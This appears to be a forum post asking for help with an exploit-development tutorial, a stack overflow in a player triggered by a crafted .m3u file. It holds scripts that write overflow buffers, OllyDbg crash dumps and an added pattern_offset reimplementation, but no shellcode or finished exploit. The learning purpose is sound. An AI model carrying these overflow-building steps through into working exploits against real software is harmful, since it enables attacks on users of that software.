I'm following a "paper" and I'd like you to clear up a few doubts I have.
Paper: http://www.exploit-db.com/download_pdf/17971
I'm posting the history of what I've done.
I create a Python script to generate an .m3u file
Code:
buffer = ""  # placeholder: the pattern string goes here (left blank in the original post)
payload = buffer.encode("ascii")  # bytes, so the binary write works on Python 3 as well as 2
f = open("Exploit.m3u", "wb")
f.write(payload)
f.close()
Code:
# 1000-byte cyclic pattern (pattern_create style): every 3-byte triplet is unique
buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
payload = buffer.encode("ascii")  # bytes, so the binary write works on Python 3 as well as 2
f = open("Exploit.m3u", "wb")
f.write(payload)
f.close()
With OllyDbg I open the file, causing an overflow:
Code:
CPU - main thread
EAX 00000000
ECX 00000000
EDX 001220B0 ASCII "C:\Users\cprados\Desktop\exploit\Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6A
EBX 0038B658 ASCII "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7A
ESP 001221B8 ASCII "Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4A
EBP 000003E9
ESI 00122990 ASCII "C:\Users\cprados\Desktop\exploit\Exploit.m3u"
EDI 000003E8
EIP 36684135
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 0 SS 0023 32bit 0(FFFFFFFF)
Z 0 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFDF000(4000)
T 0 GS 0000 NULL
D 0
O 0 LastErr 00000000 ERROR_SUCCESS
EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)
ST0 empty 1.9909870777517070580e+1958
ST1 empty -2.9727283095472006590e-1400
ST2 empty 9.1910189915361154180e+2175
ST3 empty +UNORM 145F 0BA568B6 FA5EEA55
ST4 empty -1.9778078459257461330e-656
ST5 empty 1.2054646051545530210e+616
ST6 empty 1.0000000000000000000
ST7 empty 22.000000000000000000
3 2 1 0 E S P U O Z D I
FST 0020 Cond 0 0 0 0 Err 0 0 1 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
Last cmnd 001B:76D1EC2A msvcrt.76D1EC2A
XMM0 00000000 00000000 00000000 00000000
XMM1 437984EC 66EF3DF2 CB1BEEFF 8C267657
XMM2 ED3EE9DB FB1A9069 9795720B FD1C8C47
XMM3 67839EC8 8E3B1C5C 2CD66001 3F5CD3EE
XMM4 1A014E73 BF9FF4DA B1A9F74D 39E90125
XMM5 5F38FD76 69B87053 30B4A6C2 CE27E325
XMM6 470B8912 21C0E7A4 E3B1A8C3 1A82EC9B
XMM7 19FC0166 BFBCD0C4 3B21C6ED D37B00F5
P U O Z D I
MXCSR 00001F80 FZ 0 DZ 0 Err 0 0 0 0 0 0
Rnd NEAR Mask 1 1 1 1 1 1
Now I calculate the exact size that overwrites the stack with pattern_offset on the EIP value 36684135.
The result is 227, so I modify the script again, leaving it like this:
Code:
buffer = "A" * 227
payload = buffer.encode("ascii")  # bytes, so the binary write works on Python 3 as well as 2
f = open("Exploit.m3u", "wb")
f.write(payload)
f.close()
Code:
CPU - main thread
EAX 00000000
ECX 00000000
EDX 001220B0 ASCII "C:\Users\cprados\Desktop\exploit\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBX 00029CC0 ASCII 41,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
ESP 001221B8
EBP 000000E4
ESI 00122990 ASCII "C:\Users\cprados\Desktop\exploit\Exploit.m3u"
EDI 000000E3
EIP ABABABBA
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 0 SS 0023 32bit 0(FFFFFFFF)
Z 0 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFDF000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr 00000000 ERROR_SUCCESS
EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)
ST0 empty -??? FFFF 00000000 00000000
ST1 empty -??? FFFF 00FF00FF 00FF00FF
ST2 empty -??? FFFF 00000000 00000000
ST3 empty -??? FFFF 00B200C3 00E700F9
ST4 empty -NAN FFFF B3C4E8FA FF787878
ST5 empty -??? FFFF 00B300C4 00E800FA
ST6 empty 1.0000000000000000000
ST7 empty 22.000000000000000000
3 2 1 0 E S P U O Z D I
FST 0020 Cond 0 0 0 0 Err 0 0 1 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
Last cmnd 001B:76D1EC2A msvcrt.76D1EC2A
XMM0 00000000 00000000 00000000 00000000
XMM1 00000000 00000000 00000000 00000000
XMM2 00000000 00000000 00000000 00000000
XMM3 00000000 00000000 00000000 26000000
XMM4 61007200 70006300 00000000 00000000
XMM5 00003100 4E001600 00007300 6F006400
XMM6 706F746B 73654400 11000000 00000000
XMM7 00000000 000000BE EF000400 07003800
P U O Z D I
MXCSR 00001F80 FZ 0 DZ 0 Err 0 0 0 0 0 0
Rnd NEAR Mask 1 1 1 1 1 1
Code:
CPU Stack
Address Value ASCII Comments
001221B8 ABABABAB ««««
001221BC EEFEEEAB «îþî
001221C0 000000FE þ
001221C4 00122990 �) ; ASCII "C:\Users\cprados\Desktop\exploit\Exploit.m3u"
001221C8 00000003
001221CC 00000021 !
001221D0 75D3D3D6 ÖÓÓu ; kernel32.lstrcpyA
001221D4 00122B9D �+ ; ASCII "Exploit.m3u"
001221D8 75D3D429 )ÔÓu ; kernel32.lstrcatA
001221DC 00000000
001221E0 000002FC ü
001221E4 00000003
001221E8 00000021 !
001221EC 00000000
001221F0 000000E3 ã
001221F4 00000047 G
001221F8 7713DF26 &ßw ; RETURN from ntdll.RtlFillMemoryUlong to ntdll.7713DF26
001221FC 001222E0 à"
00122200 770DF0F2 òðw ; RETURN from ntdll.770DF0BE to ntdll.770DF0F2
00122204 77122447 G$w ; RETURN from ntdll.7710481D to ntdll.77122447
00122208 0012A021 !*
0012220C 001B0000
00122210 00000000
00122214 00000000
00122218 001B0148 H
0012221C 000000E3 ã
00122220 41414141 AAAA
00122224 41414141 AAAA
00122228 41414141 AAAA
0012222C 41414141 AAAA
00122230 41414141 AAAA
00122234 41414141 AAAA
00122238 41414141 AAAA
0012223C 41414141 AAAA
00122240 41414141 AAAA
00122244 41414141 AAAA
00122248 41414141 AAAA
0012224C 41414141 AAAA
00122250 41414141 AAAA
00122254 41414141 AAAA
So here come my questions...
Why isn't EIP overwritten with "A" (EIP ABABABBA)?
In the paper the guy uses 207 characters instead of the 227 that pattern_offset calculated for me; why?
Then he says that with findjmp he tries to find valid addresses in order to jump to our shellcode afterwards. I don't understand this part; in fact, I don't know which library I'm supposed to search...
That's all for now, because I don't want to carry on with the tutorial without clearing these things up...
Sorry for the long post, and apologies again if this doesn't belong here.
Thanks everyone.
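Added example, not from the post or from the paper it follows: a Python reimplementation of what pattern_create and pattern_offset do, so the 227 in the post can be checked by hand from the EIP value 36684135. The function names pattern_create, pattern_offset and describe_eip are this example's own, not Metasploit's code; it also shows that a value such as ABABABBA (the "A" * 227 run) is not four consecutive pattern bytes, which is what a -1 result means.

```python
import string
import struct


def pattern_create(length=1000):
    """First `length` chars of Aa0Aa1...Az9Ba0... (every 3-byte triplet is unique)."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(eip_hex, length=1000):
    """Offset in the pattern of the 4 bytes seen in EIP, or -1 if they are not from it.

    The debugger shows EIP as a hex number ("36684135"); x86 is little-endian, so the
    bytes that were actually copied over the return address are 35 41 68 36 = "5Ah6".
    """
    needle = struct.pack("<I", int(eip_hex, 16))
    return pattern_create(length).encode("ascii").find(needle)


def describe_eip(eip_hex):
    """Verdict for a crash value, matching the two runs shown in the post."""
    off = pattern_offset(eip_hex)
    if off < 0:
        return "EIP %s is not four consecutive pattern bytes" % eip_hex
    return "EIP %s = pattern[%d:%d]: %d bytes precede the value that lands in EIP" % (
        eip_hex, off, off + 4, off)


if __name__ == "__main__":
    print(describe_eip("36684135"))  # offset 227, as pattern_offset reported in the post
    print(describe_eip("ABABABBA"))  # value from the "A" * 227 run: not pattern bytes
```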